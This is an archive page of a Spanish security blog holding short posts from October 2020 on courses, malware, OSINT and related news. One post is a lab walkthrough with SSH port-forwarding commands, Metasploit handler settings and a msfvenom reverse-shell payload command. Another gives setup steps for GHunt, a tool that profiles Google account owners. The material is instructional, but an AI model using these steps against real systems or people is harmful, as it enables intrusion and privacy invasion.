21 oct. 2020

Curso gratuito de actuación ante pérdidas de datos

Por el 21 oct. 2020 con 0 comentarios

Hola lectores. 

Desde hace unas semanas, he visto que de manera periódica uno de mis contactos en Linkedin publicaba lecciones sobre actuación ante pérdidas de datos. Una vez finalizó, contacté con José Alberto (el creador del contenido) para ver si me permitía compartirlo con todos vosotros. Creo que el curso que ha generado puede ser de interés ya que, como sabéis, las pérdidas de datos están a la orden del día tanto en entornos domésticos, como en empresariales. Vivimos en un momento en el que el grueso de la información que almacenamos es digital y está almacenada en todo tipo de soportes, por lo que es más que aconsejable tener cierta formación sobre los dispositivos de almacenamiento y, saber cómo actuar ante una situación de pérdida de datos, es clave.


RecuperaData, ha puesto a disposición de todos en LinkedIn una serie de lecciones, así como vídeos resumen adicionales de cada lección, como soporte de las mismas. Además, para todos los que quieran comprobar su nivel de conocimiento, pueden probar a hacer el examen que han publicado y obtener su certificado.

A continuación, os dejo los links: 

La verdad es que se agradecen iniciativas como ésta, espero que sea de vuestro interés.

¡Saludos! 

Leer más
      editar

20 oct. 2020

Los correos de Hunter Biden: el debate (electoral y no electoral) está servido

Por el 20 oct. 2020 con 0 comentarios

¡Buenas!

Hace unos días que el diario estadounidense New York Post se hacía eco de "los correos electrónicos secretos de Hunter Biden" en los que se publica que supuestamente se habría aprovechado de la posición de su padre Joe Biden, en aquel momento Vicepresidente de los Estados Unidos, para beneficiar a la compañía energética ucraniana Burisma.

Uno de los presuntos correos electrónicos

Según la publicación, estos correos electrónicos provienen del MacBook Pro de Hunter Biden. Este equipo se dejó en una tienda de reparaciones de Delaware en Abril de 2019 por sufrir daños por agua,  el servicio de reparación no fue pagado, ni tampoco se recuperó el disco duro, ni el ordenador, a pesar de los esfuerzos del dueño de la tienda por contactar con el cliente, al que no pudo identificar como Hunter Biden. El FBI confiscó tanto el ordenador como el disco duro en el mes de diciembre de 2019 después de que el dueño de la tienda informara de su existencia, sin embargo, el dueño de la tienda realizó una copia del contenido del disco duro y, al parecer, se la entregó a Robert Costello, abogado del ex alcalde de Nueva York Rudy Giuliani. Este último fue quien entregó la copia al New York Post recientemente, después de que Steve Bannon, ex-asesor de Donald Trump, confirmara la existencia de dicho disco duro a finales de septiembre de este año.

Resumen de los acontecimientos

Pues bien, a raíz de la publicación del New York Post no ha tardado en desatarse el debate en redes sociales sobre la veracidad o la manipulación de dichos correos electrónicos debido a que estos han sido publicados como impresiones en PDF y no mediante los correos electrónicos originales. Diferentes usuarios han compartido capturas de pantalla con los metadatos de los documentos PDF, así como otra información, indicando que estos fueron creados durante el tiempo que el ordenador estuvo en la tienda de reparaciones.

Comentarios en Twitter sobre la fecha de creación de los documentos PDF

La principal duda que se plantean los usuarios es la diferencia entre las fechas de los correos electrónicos, la fecha de creación de los ficheros PDF y el momento en que estos han visto la luz, hecho por el que ponen en tela de juicio la veracidad de dichas publicaciones y sospechan de una posible manipulación de estos. También se comenta el pixelado o la calidad de la imagen de los correos publicados al haber sido exportados a formato PDF. No obstante, también hay opiniones que tratarían de justificar el por qué de estas diferencias.

Encabezado de la impresión PDF del correo electrónico publicado por New York Post

A pesar de las publicaciones anteriores y el espíritu crítico para cuestionar la autenticidad de las publicaciones, no parece que se pueda confirmar o desmentir sin analizar las cabeceras y el contenido de los correos electrónicos originales (siempre y cuando se haya podido garantizar la cadena de custodia) para determinar si estos han sido alterados o creados con alguna intencionalidad determinada, dado que han visto la luz en plena campaña electoral. Sin embargo, se pueden analizar los correos publicados por New York Post (correo 1 y correo 2) con herramientas como Metashield, en las que se pueden verificar si los metadatos difundidos por otros usuarios son correctos o manipulados y, en este caso, coinciden.

Análisis con Metashield de los correos publicados en el New York Post
Nota: la diferencia en la hora de creación con respecto a otras publicaciones se debe a los distintos husos horarios 

Teniendo en cuenta que las elecciones presidenciales de Estados Unidos se encuentran a la vuelta de la esquina (el 3 de noviembre), no es de extrañar que estas publicaciones sean utilizadas como arma arrojadiza en uno y otro sentido, dado que no sería la primera vez que se emplean filtraciones correos electrónicos para tratar de ganar votos o cambiar el sentido de estos, como ocurrió en las elecciones de 2016 con la denominada injerencia rusa y que, a día de hoy, se sigue utilizando como arma electoral.

Además de lo anterior, las elecciones presidenciales de Estados Unidos de 2016 también son recordadas por el escándalo de Cambridge Analytica, en el que se lanzaron campañas publicitarias en Facebook que buscaban influir en las elecciones explotando información personal y contraviniendo las normas de la red social.

Considerando la importancia que tiene un proceso electoral para cualquier Estado democrático, sea cual sea, queda patente una vez más que el buen o el mal uso de la información puede influir y llegar a ser decisivo en los resultados finales.

El debate está servido.

¡¡Saludos y hasta el próximo post!!

Leer más
      editar

19 oct. 2020

Women in Cybersecurity (Young, educated and ready to take charge)

Por el 19 oct. 2020 con 0 comentarios
Hola lectores. 

Los que me conocéis, sabéis que a mi me gusta la gente con talento (descubierto, o aún por descubrir) y que los equipos con los que trabajo, proporcionen siempre la máxima calidad posible. Por ese motivo, trabajamos con la filosofía de hacer las cosas cómo nos gustaría recibirlas si fuesen para nosotros. Siempre suelo decir, que factores como el género, la raza o la religión, no deberían de intervenir en ninguno de ellos, pero desgraciadamente, todos sabemos que esto no es siempre así. Por este motivo, quiero compartir con vosotros el informe que han elaborado desde ISC2 donde se ve la evolución del papel y la presencia de la mujeres en la ciberseguridad durante 2020. No soy muy fan de los números y las estadísticas en este tema, pero creo que es importante saber que durante 2020 las mujeres entrevistadas ocupan casi el 24% de las posiciones del sector y que es una tendencia en aumento. Sé que falta mucho para que esté equilibrado, pero parece que estamos trabajando en el buen camino, por lo que creo que es importante que todos reflexionemos tras prestarle al informe la atención que se merece y, que nos planteemos cómo podemos poner nuestro granito de arena.


Quiero dar las gracias a womandigital, ya que descubrí el informe a través de su web (desde donde podéis acceder a leerlo).

Espero que os haga reflexionar y nos ayudéis a hacer más fácil llevar la ciberseguridad a la sociedad, con iniciativa como la que planteamos en éste post

Leer más
      editar

16 oct. 2020

Microsoft alerta sobre un nuevo ransomware para Android

Por el 16 oct. 2020 con 0 comentarios

Buenas a todos,

En el post de hoy vamos a hablar un poco de malware, ya que hace unos días, el equipo de investigación de Microsoft 365 Defender descubrió un ransomware para el Sistema Operativo Android que ha llamado mucho mi atención.

Este nuevo malware parece que es capaz de lograr evadir muchas de las protecciones disponibles, con una tasa de detección muy baja. Aunque inicialmente parecía un nuevo malware, se ha descubierto que este ransomware es realmente una variante de la familia MalLocker. Sobre esta familia de ransomware, trataré de hablar en futuros post, sin embargo, creo que es interesante decir que es conocida por usar la ingeniería social al usar la apariencia de aplicaciones populares, juegos crackeados o reproductores de vídeo, lo que hace que se difunda con mucha facilidad.

Lo que es novedoso y llamó mi atención de esta variación respecto a sus antecesores es la forma en la que muestra al usuario el típico mensaje de rescate. Los antiguos ransomware de Android utilizaban el permiso “SYSTEM_ALERT_WINDOW” para mostrar el mensaje de rescate, fijándolo en una ventana que permanecía delante de cualquier otra pantalla, dejando el terminal inutilizado. En cambio, esta nueva versión hace uso de varios componentes de Android para generar su mensaje:

  • Notificacion.Builder: Clase para la construcción de notificaciones.
  • setCategory(“call”): Método que permite asignar una categoría a la notificación. En este caso como llamada entrante (voz o video).
  •  setFullScreenIntent(): Método que lanza un intento de iniciar la notificación en pantalla completa el lugar de publicarla en la barra de estado. Su uso se debería limitar a notificaciones con prioridad máxima como una llamada telefónica o una alarma.
  • onUserLeaveHint(): Método de la clase Activity que se llama cuando un objeto de dicha clase (una actividad) está a punto de pasar a segundo plano como resultado de la elección del usuario.
    • Una actividad en Android, es una tarea que puede hacer el usuario a través de una pantalla. De manera muy rápida y vaga, pero para que se entienda, cada actividad es una pantalla de la aplicación.

De esta manera, el ransomware primero crea una notificación nueva con la categoría para llamadas entrantes (“call”), conectándola con la futura actividad “ransomActivity” y con el método para el intento de pantalla completa. A continuación, podéis ver el extracto de código:

Creación de la Notificación

Actividad del ransomware

Después, crea una actividad para que se active cuando el usuario interactúe y sobrescriba la función onUserLeaveHint(), consiguiendo que cuando la pantalla vaya a pasar a segundo plano se lleve automáticamente a primer plano. Estas acciones en conjunto consiguen que se active una ventana emergente de forma automática que muestra las instrucciones de pago.

En el siguiente enlace, podéis leer la investigación al completo realizada por el equipo de Microsoft.

En el próximo post hablaremos sobre más detalles técnicos como su ofuscamiento y parte de su funcionamiento.

¡¡Saludos!!


Leer más
      editar

15 oct. 2020

Adiós OSCE, ¿hola OSCX?

Por el 15 oct. 2020 con 0 comentarios
¡Muy buenas a todos!

Hace un par de meses, el equipo de Offensive Security publicaba que hoy, 15 de octubre de 2020, sería el último día de vigencia del curso CTP y, por consiguiente, de su certificado OSCE.
Fig 1: Nunca te olvidaremos.
Para aquellos que no lo conozcan, el curso CTP (Cracking the Perimeter)  es era el curso introductorio desarrollado por Offensive Security para adquirir conocimientos relacionados con el exploiting, tanto en Linux como en Windows (más este último que el primero). 
Fig 2: Índice de contenido del OSCE.
Como era de esperar, este curso fue desarrollado hace miles de varios años y nunca había sido actualizado (algo común en Offensive Security hasta hace pocos meses), por lo que era cuestión de tiempo que ésta situación se produjera. 
Fig 3: Nuevas versiones; todas han salido en 2020.
Desde mi punto de vista, el contenido del curso solo necesitaba un ligero lavado de cara y una adaptación a los sistemas operativos de la actualidad; no había necesidad de retirarlo, ya que el contenido técnico (casi en su totalidad), era, es y será siempre el mismo para una introducción al exploiting. No obstante, siendo realista, cabe recordar que todas las máquinas del laboratorio eran Windows XP, Windows 7 y Windows Server 2003, junto a una Backtrack para realizar los ataques...tal vez no haya sido tan mala idea.
Fig 4: Mírala que maja, si hasta te instalabas el GUI a mano.
Por último, en este mismo comunicado, destacan que su vacío será ocupado por dos nuevos certificados que se anunciarán antes de fin de año, uno relacionado con exploiting en Windows y otro, relacionado con pentesting avanzado.

¿Mis apuestas? 
  • Pentesting Avanzado: Algo relacionado con Red Team, seguramente simulando el CRTO de Rastamouse (del que ya hablamos hace unos meses), los ProLabs de HTB o los Red Team Labs de Pentester Academy.
  • Windows Exploiting: Un nuevo OSCE actualizado adaptándose a los nuevos entornos Windows y dejando atrás los maravillosos Windows 7, XP y Server 2003 del OSCE.
Y vosotros, ¿qué opináis? ¿Jugada maestra de marketing o golpe de efecto sobre el mundo de las certificaciones de seguridad?
Fig 5: All in.
Happy Juancking!
Leer más
      editar

14 oct. 2020

Microsoft Azure Audit Program

Por el 14 oct. 2020 con 0 comentarios
Hola lectores.
 
A nadie se le escapa que el cloud computing se ha convertido en "la nueva normalidad" para cualquier empresa que dependa de la tecnología, independientemente de su sector. Esto es gracias a su velocidad, flexibilidad y capacidad de escalado. Pero nosotros nos dedicamos a la seguridad, y por ese motivo sabemos que es muy importante que las empresas sepan cómo mantenerlo de una manera adecuada, y para ello, la auditoría es un elemento clave. 

Un equipo de expertos de ISACA Internacional ha desarrollado un programa de auditoría de Microsoft® Azure (en el siguiente enlace podéis ver nuestro hilo sobre Azure)  para ayudar a los auditores a medida que evalúan la idoneidad y la eficacia de los servicios de Microsoft y para poder garantizar que la implementación de Azure respalde de forma segura los objetivos operativos y de cumplimiento de las organizaciones. 



 El programa de auditoría de Azure (que podéis consultar aquí) cubre las siguientes áreas: 
  • Gobierno
  • Configuración y gestión de redes 
  • Gestión de identidades y accesos 
  • Seguridad de recursos 
  • Registro y seguimiento 
  • Respuesta a incidentes de seguridad 
  • Controles de cifrado de datos 

El documento, conformado por un PDF y un EXCEL, está disponible de forma gratuita para los miembros de Isaca, o por $49 para el resto de interesados.



¡Espero que sea de vuestro interés!

Leer más
      editar

13 oct. 2020

Congreso #CiberTodos 2020

Por el 13 oct. 2020 con 0 comentarios
Buenos días lectores. 

Desde hace unos años estoy involucrado con el capítulo de Madrid de ISACA, tratando de echar una mano en todo lo que sea necesario. Por este motivo me gustaría apoyarles desde Flu Project con su iniciativa: “La ciberseguridad: una responsabilidad de todos", más conocida como “CiberTodos”.

Para los que no lo sepáis, este mes de octubre es el Mes Europeo de la Ciberseguridad (aunque ya es una iniciativa global), impulsado por ENISA (organización de la que ya os hablé en éste post) y CiberTodos, es la manera que tenemos desde ISACA Madrid para poner nuestro granito de arena. 

Cada año acuden a CiberTodos cerca de 250 profesionales del sector, pero este 2020, debido a la situación de pandemia mundial en la que nos encontramos. se ha decidido optar por un modelo virtual, totalmente gratuito, que se celebrará los días 1, 8, 15, 22 y 29 de octubre, en horario de 18:00 a 20:00 CE. Este modelo está cosechando grandes resultados, tanto de audiencia, con más de 2500 personas conectadas, como de valoración por parte de los asistentes, por lo que os esperamos en la próxima sesión.

Para todos aquellos que no conocíais esta iniciativa, a continuación os compartimos los videos de las dos primeras sesiones:  

Si estáis interesados en conocer más sobre esta iniciativa, en el siguiente enlace tenéis toda la información oficial del mismo.

Espero que os sea de interés, ¡nos vemos en Cibertodos!


Leer más
      editar

12 oct. 2020

Luchando contra el ransomware: nomoreransom.org

Por el 12 oct. 2020 con 0 comentarios

¡Buenas!

Hoy queremos hablaros de una iniciativa que promueve la lucha contra el ransomware: No More Ransom! A lo largo de este complejo 2020 continúa el auge de las ciberamenazas y, en muchas ocasiones, los cibercriminales se aprovechan situaciones y narrativas relacionadas con la pandemia que estamos viviendo para tratar de infectar nuestros equipos con malware y, en este sentido, el ransomware puede ser uno de los que puede causar un mayor impacto.

https://www.nomoreransom.org/

Como muchos sabréis, el ransomware es un tipo de malware que cifra la información (personal y profesional indistintamente), impidiendo el acceso a esta, pudiendo bloquear el acceso a los usuarios en los sistemas afectados y solicitando el pago de un rescate para poder acceder a ellos. Las consecuencias de este tipo de ataques pueden ser desde pérdidas millonarias por la paralización de los servicios, hasta el cierre de un negocio si no se han tomado medidas de seguridad que puedan mitigar el impacto en el caso de producirse una infección, como por ejemplo, la realización de copias de seguridad. Habitualmente se suele combinar este tipo de malware con otros que permitan exfiltrar la información, de manera que los ciberdelicuentes puedan realizar extorsiones y amenazas de publicar la información extraída en el caso de que no se pague el rescate y filtrando muestras de este contenido para ejercer presión.

El proyecto No More Ransom! fue creado en julio de 2016 como fruto de la colaboración entre la Europol, la policía neerlandesa, y las compañías de seguridad Kaspersky y McAfee, con el objetivo de combatir este tipo de amenazas y proveer a la ciudadanía de herramientas que permitan recuperar y descifrar los ficheros afectados por este tipo de malware sin necesidad de pagar el rescate. Desde su origen hasta el día de hoy se han sumado al proyecto numerosas empresas de ciberseguridad así como Fuerzas y Cuerpos de Seguridad de diferentes Estados, entre ellos España. Es por ello que desde No More Ransom! también se ha habilitado un apartado desde el que interponer una denuncia en el caso de que seamos víctimas de un ciberataque mediante ransomware.

Además, para ayudar a las víctimas, se han puesto a disposición dos herramientas bastante útiles en el caso de que se haya sufrido un ataque con este tipo de malware. La primera de ellas se llama Crypto Sheriff, que es un analizador de evidencias (ficheros cifrados, notas de rescate, direcciones de correo electrónico, carteras de criptomonedas, etc.), mediante el que identificar el tipo de ransomware y mostrar si existe una solución para revertir la situación.

Crypto Sheriff

La otra, se trata de un repositorio de herramientas de descifrado para aquellos tipos de ransomware cuyas claves han sido descubiertas o bien, que se haya encontrado la solución para descifrar los ficheros afectados.

Repositorio de herramientas de descifrado

Para concluir, disponen de un apartado con consejos de prevención que pueden mitigar el impacto de un ciberataque mediante ransomware y que se pueden resumir en los siguientes puntos:

  • No pagar el rescate bajo ningún concepto, pues no suele haber garantía de poder recuperar la información tras realizarse el pago.
  • Realizar copias de seguridad, mantenerlas lo más actualizadas posibles y almacenarlas en una ubicación diferente a la fuente de información original (dispositivo externo, almacenamiento en la nube, etc.)
  • Disponer de las últimas actualizaciones y parches de seguridad en los sistemas y equipos.
  • Contar con un software antivirus actualizado.
  • Mostrar las extensiones de los archivos mediante el menú de configuración de Windows.
  • Desconfiar. Los usuarios finales somos una línea de defensa fundamental identificando ficheros adjuntos potencialmente sospechosos, emails cuya procedencia, aunque confiable, nos pueda hacer dudar, etc.  
¡¡Saludos y hasta el próximo post!!

Leer más
      editar

9 oct. 2020

haveibeenEMOTET: Descubre si tu correo electrónico (o dominio) está involucrado en campañas de malspam con EMOTET

Por el 9 oct. 2020 con 0 comentarios

¡Buenas!

Hoy queremos hablaros del servicio haveibeenEMOTET, que permite identificar si una dirección de correo electrónico o un dominio se ha visto involucrado en la difusión de malspam conteniendo el troyano Emotet. Este malware es una de las amenazas más peligrosas existentes, no solo por su capacidad para robar información sensible, como pueden ser contactos, credenciales y datos bancarios, sino por sus capacidades de evasión, de instalación de malware adicional, de recibir actualizaciones a través de servidores de C&C o de explotar ciertas vulnerabilidades, entre otras. Esta combinación hace que su detección sea compleja puesto que, adicionalmente, es capaz de enviarse a los contactos robados, por lo que puede propagarse de manera indiscriminada en campañas de malspam a correos electrónicos de organizaciones y de particulares.

haveibeenEMOTET

El servicio, lanzado de manera gratuita por los investigadores de TG Soft contiene un buscador en el que se tiene que introducir el correo electrónico o el dominio sobre el que se quiere averiguar si ha estado de algún modo involucrado en un envío o recepción de malspam con Emotet. Igualmente contiene un ejemplo de malspam con Emotet , así como la fecha de última actualización de la base de datos.

Buscador de correo electrónico o dominio

Si introducimos algunos de los dominios de proveedores de correo electrónico de uso común, se obtienen resultados referentes a que ha habido receptores (Recipient), suplantaciones mediante las que se hace creer que el emisor es de confianza (Fake Sender) y emisor cuya cuenta ha sido comprometida (Real Sender).

Dominios de servicios de correo electrónico de uso común afectados 

Igualmente ocurre si introducimos el dominio de un negocio o empresa cualquiera y hay registros en la base de datos:

Dominio involucrado en envíos de malspam con Emotet

Si una cuenta o dominio no se ha visto involucrada en un en un envío o recepción de correo electrónico con Emotet o no cuenta con registros en la base de datos del servicio, nos indicará que no ha sido encontrado.

Correo electrónico no involucrado en envíos de malspam con Emotet

Por último, el servicio cuenta con un apartado de estadísticas con las extensiones de los dominios más utilizadas como emisor, suplantado y receptor.

Estadísticas sobre malspam con Emotet


¡¡Saludos y hasta el próximo post!!

Leer más
      editar

8 oct. 2020

¿Qué dice tu cuenta de Google sobre ti?

Por el 8 oct. 2020 con 4 comentarios

¡Buenas a todos!

En el artículo de hoy vengo a mostraros una herramienta que recientemente ha publicado @mxrchreborn y que abusa de "características" ya conocidas sobre las cuentas de Google. La herramienta en cuestión es GHunt, creada principalmente para realizar tareas de OSINT sobre una cuenta de Google a través de los identificadores de cuentas de Google, también llamados Google IDs.

Actualmente la herramienta es capaz de recoger información como el nombre del dueño de la cuenta, la última vez que el perfil ha sido editado, si la cuenta se trata de un bot de Hangouts, servicios de Google activos, así como información pública sobre sus teléfonos móviles, fotos públicas, reseñas u otras muchas características.

En este artículo además de mostraros la eficiencia de la herramienta, quiero mostraros una guía detallada de como "instalarla" en vuestra distribución de preferida y hacer uso de la misma. Así que antes de nada clonemos el repositorio e instalemos las dependencias necesarias. En primer lugar instalaremos Google Chrome (en mi caso en una distribución basada en Debian) ya que la herramienta hace uso de Selenium para realizar sus funciones:

git clone https://github.com/mxrch/GHunt
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
sudo apt install ./google-chrome-stable_current_amd64.deb

Tras realizar la instalación debemos de fijarnos en la versión de Chrome instalada, ya que es necesario que el chromedriver utilizado en Selenium sea de la misma versión que la instalación de Google Chrome que acaba de hacerse. A fecha de escritura del post, la versión que he utilizado es la 85.0.4183, por tanto, continuamos con el resto de dependencias de la herramienta:

cd GHunt/
python3 -m pip install -r requirements.txt
wget https://chromedriver.storage.googleapis.com/85.0.4183.87/chromedriver_linux64.zip
unzip chromedriver_linux64.zip

Tras instalar estas dependencias debemos asegurarnos que el chromedriver se encuentra en la carpeta del proyecto de GHunt. Siguiendo los pasos anteriores, no debería haber ningún problema :)

Seguidamente deberemos configurar la herramienta, preferiblemente con una cuenta de Google que no utilicemos actualmente o que creemos con el propósito en específico de utilizar la herramienta. Acto seguido debemos obtener las cookies asociadas a la cuenta que acabamos de crear. Para ello, realizamos un inicio de sesión en Google Account y obtenemos los valores de las siguientes Cookies a través de las herramientas de desarrollador.

Para acceder a las herramientas de desarrollador, puede hacerse desde la tecla F12 (por defecto) o haciendo cualquier clic derecho en la página y seleccionando la opción de inspeccionar elemento.

Finalmente, para comprobar si la herramienta funcionaba correctamente, probé a introducir mi email personal, y para mi sorpresa, la posible localización que me ofrecía era correcta :)

Si os ha gustado la herramienta no dudeis en echarle un vistazo y, probadla siempre con cuentas de vuestra propiedad para verificar la información que estáis exponiendo "públicamente".

¡Saludos!

Leer más
      editar

7 oct. 2020

OWASP API-Check

Por el 7 oct. 2020 con 0 comentarios

Hola lectores. 

Hoy os voy a presentar un proyecto realmente interesante para todos aquellos que se dedican o están interesados en el mundo del desarrollo, o que dentro de sus funciones de ciberseguridad, están encargados de su fortificación. 

Los compañeros de OWASP, en un proyecto liderado por nuestro amigo Chron, han diseñado OWASP API-Check, que nace con la intención de ser el conjunto de herramientas DevSecOps para HTTP APIs.

https://owasp.org/www-project-apicheck/


APICheck es un entorno para integrar herramientas de HTTP APIs existentes y crear cadenas de ejecución de una manera fácil y sencilla, siendo capaz de integrarse en algo menos de diez minutos. 




Para los que queráis saber más, aquí os dejo más información y en este enlace podéis colaborar con el proyecto.

Espero que os resulte interesante.

Leer más
      editar

6 oct. 2020

Cómo configurar Metasploit con Portforwarding

Por el 6 oct. 2020 con 0 comentarios

¡Muy buenas a todos!

Estos últimos meses he estado trabajando bastante con técnicas de portforwarding (sobre todo en los ProLabs de HackTheBox) y me gustaría contaros un pequeño caso que me encontré que os puede ser de utilidad algún día.

Primero, pongámonos en contexto. Imaginemos la siguiente situación: queremos acceder a cierta máquina víctima C a la cual solo tenemos acceso desde cierta máquina de salto B (sobre la que tenemos control), pero no desde nuestra máquina atacante A. Además, dicha máquina C es vulnerable a cierto exploit X que solo podemos lanzar desde nuestra máquina atacante A y, obligatoriamente, con una reverse shell, no hay posibilidad de usar una bind shell. ¿Cómo lo hacemos?

Fig 1: Esquema de red.

 Bien, el primer paso será conseguir tener visibilidad sobre la máquina C. Para ello, emplearemos sshuttle.

Nota: como hemos comentado antes, vamos a suponer que tenemos acceso a la máquina B por SSH y privilegios de administrador.

Desde la máquina atacante A (Kali-Azul), lanzaremos el siguiente comando:

sshuttle -r user@IP_MaquinaB Red_Máquina_C

Donde: 

  • IP_MaquinaB es 192.168.57.129.
  • Red_Máquina_C es la VLAN donde se encuentra la máquina C, en este caso, 172.16.1.0/24.
Fig 2: Sustituyendo, quedaría así.

Ahora, si todo ha funcionado correctamente, desde nuestra Kali tendremos visibilidad sobre la máquina víctima C.

Fig 3: Confirmo, tenemos visibilidad.

El siguiente paso será explotar la vulnerabilidad X en la máquina objetivo, pero nos encontramos un problema, ¿cómo indicamos a la reverse shell a dónde tiene que ir? Si nos fijamos, ahora mismo, desde la máquina víctima no es posible llegar a la Kali. No hay problema, para esto, tendremos que realizar una redirección de puertos con SSH en la máquina de salto.

Nota: previo a lanzar el siguiente comando, hay que modificar la configuración de SSH de la máquina de salto con la directiva GatewayPorts clientspecified ya que, por defecto, SSH usa localhost para este tipo de redirecciones. 

Fig 4: Configuración necesaria de SSH en la máquina de salto.

Usaremos el siguiente comando:

ssh -R IP_Maquina_Salto_VLAN_1:Puerto_Escucha:IP_Kali:Puerto_Escucha_Kali user@IP_IP_Maquina_Salto_VLAN_1 

ssh -R 172.16.1.129:9999:192.168.57.156:8080 mrsquid@172.16.1.129

Con esto estamos indicando que toda conexion que reciba nuestra máquina de salto en el puerto 9999 sea redirigida a nuestra máquina atacante en el puerto 8080.

Fig 5: Ejemplo de comando.

Si ahora intentamos acceder desde la máquina víctima a la máquina atacante, podremos ver que llegamos sin problemas.

Fig 6: Conexión de prueba al servidor de python levantado en la máquina atacante.

Recapitulando, hasta el momento tenemos visibilidad desde nuestra máquina atacante hasta la máquina víctima y, también, tenemos visibilidad desde la máquina víctima a nuestra máquina atacante (aunque solo al puerto 8080). Ahora solo nos faltaría arrancar Metasploit y preparar el exploit.

Aunque no lo hemos comentado, lanzaremos el exploit manualmente (desde otra consola) y recibiremos la reverse shell en Metasploit. Ahora bien, como estamos usando un máquina de salto, tendremos que indicar a Metasploit esta situación mediante las opciones ReverseListenerBindAddress y ReverseListinerBindPort. Gracias a esto, Metasploit se encargará de enrutar todo el tráfico recibido en 172.16.1.129:9999 a 192.168.57.156:8080 y, así, conseguir que la reverse shell llegue a destino. 

Nota: si no lo configuramos así, la shell llegará, pero morirá instantáneamente.

La configuración quedaría de la siguiente manera:

  • Handler como exploit.
  • Shell_reverse_tcp como payload.
  • LHOST y LPORT con los valores de la máquina de salto.
    Fig 7: Valores asignados a la reverse shell.

  • ReverseListenerBindAddress y ReverseListenerBindPort con los valores de nuestra máquina atacante.
Fig 8: Valores asignados.

Una vez todo listo, si ejecutamos el exploit tras lanzar el listener de Metasploit, veremos como la shell llega a buen puerto.

Fig 9: Pwned!

Para terminar, os dejo el mismo diagrama del principio, pero con el tráfico seguido por el exploit. 

Fig 10: Diagrama de red final.

Nota: la vulnerabilidad se encontraba en un pequeño ejecutable con un simple buffer overflow escuchando en la máquina víctima. El payload que se ejecuta es una generic reverse shell de Metasploit creada con el siguiente comando.

msfvenom -p windows/shell_reverse_tcp LHOST=172.16.1.129 LPORT=9999 -f

PD: Si algo no ha quedado claro o me he equivocado en algo, podéis mandarme DM por Twitter. Estaré encantado de leeros.

Happy pivoting!

Referencias:

  • https://blog.notso.pro/2019-10-24-tactical-debriefing1/
Leer más
      editar

5 oct. 2020

Open Source Intelligence Tools and Resources Handbook

Por Juan Antonio Calles el 5 oct. 2020 con 0 comentarios

Buenas a todos. Recientemente, por nuestros amigos de Ginseg nos hacíamos eco de la publicación del Open Source Intelligence Tools and Resources Handbook por parte de i-intelligence, la reputada organización suiza especializada en Inteligencia.


De acuerdo a la publicación oficial de los propios autores, no se trata únicamente de un manual para investigadores experimentados y profesionales del campo de la seguridad de la información, sino que más bien, se encuentra dirigido a cualquiera que desee mejorar la calidad de sus investigaciones, independientemente de dónde se encuentre en su carrera académica o profesional, de manera que los recién llegados al mundo OSINT puedan usar las diferentes categorías de herramientas para orientar su aprendizaje, mientras que aquellos que las administran con más soltura pueden usar las mismas categorías para explorar el estado de la técnica.

El manual podréis descargarlo gratuitamente desde su sitio web oficial:

https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf

Saludos!

Leer más
      editar

2 oct. 2020

Amazon Machine Learning University

Por el 2 oct. 2020 con 0 comentarios

Hola lectores. 

Estaba curioseando un poco en Twitter y me encontré con una publicación de @Ricardo_Moya_G un ex compañero de la facultad y una de las personas que conozco con mayor conocimiento en Inteligencia Artificial en España.    

En este Tweet comentaba que se han publicado a través de Youtube tres cursos de la Amazon Machine Learning University que antes solo estaban disponibles para los empleados de Amazon y que ahora han sido liberados. 



Tal y como os comenté en post sobre Microsoft Video Authenticator, la IA cada vez va a tener más peso en el mundo de la ciberseguridad, por lo que todos los que quieran aprender más sobre este apasionante mundo, tienen una gran oportunidad de mejorar gracias al material de una de las empresas punteras en lo que a tecnología respecta. 


En resumen, los cursos son los siguientes:

Por otra parte, todos aquellos que queráis aprender de este crack de la IA y de sus compañeros de Jarroba, tenéis disponibles multitud de cursos gratuitos en su web.

Espero que os sea de utilidad. 

Un abrazo.

Leer más
      editar

1 oct. 2020

Microsoft Video Authenticator: herramienta para combatir la desinformación

Por el 1 oct. 2020 con 0 comentarios

¡Muy buenas!

Para la gran mayoría de los que tenemos la suerte de estar trabajando (o estudiando), las vacaciones se acabaron y parece que el ritmo vuelve a la normalidad (si en estos tiempos puede decirse que algo vuelve a la normalidad), pero por desgracia no se ha dado el milagro y los cibercriminales también están de vuelta.

En este post vamos a hablar de la desinformación y de una herramienta desarrollada por Microsoft, para combatirla, se trata de Microsoft Video Authenticator. Y es que en la actualidad, no hay duda de que la desinformación está cada día más presente. En un estudio presentado por la propia Microsoft, se determinó que entre 2013 y 2019 fueron identificadas 96 campañas de influencia extranjera dirigidas a 30 países distintos. Son campañas que aprovechan la gran difusión de las redes sociales para difamar a personas notables, persuadir al público o polarizar debates. Lo interesante del estudio que se realizó es que aproximadamente el 93% de estas campañas incluyeron la creación de contenido original, el 86% amplificó contenido preexistente y el 74% distorsionó hechos objetivamente verificables.

Un problema importante al que nos enfrentamos son los deepfakes (fotos, vídeos o archivos de audio manipulados por inteligencia artificial) muy difíciles de detectar. Un ejemplo muy típico es el de Jennifer Lawrence y su modificación con el rostro de Steve Buccemi. En estos vídeos, se puede hacer que parezca que las personas suplantadas digan o hagan cosas que no se correspondan con la realidad. El  hecho de que sean generados por una IA que sigue aprendiendo, hace que sea inevitable que superen la tecnología de detección convencional. Por eso, es necesario que existan herramientas que con la misma tecnología, luchen para identificarlo.

Microsoft Video Authenticator permite analizar una foto fija o un vídeo para proporcionar un porcentaje de probabilidad de que haya sido manipulado. De hecho, en el caso de los vídeos, puede proporcionar este porcentaje en tiempo real en cada cuadro a medida que se esté reproduciendo. Esta herramienta funciona detectando el límite de fusión de los elementos deepfake y los elementos sutiles que se desvanecen, o analizar la escala de grises que pueden no ser detectables por el ojo humano, pero si para la IA.



En cuanto se pueda probar, os daremos nuestras impresiones :)

Un saludo!


Leer más
      editar
< >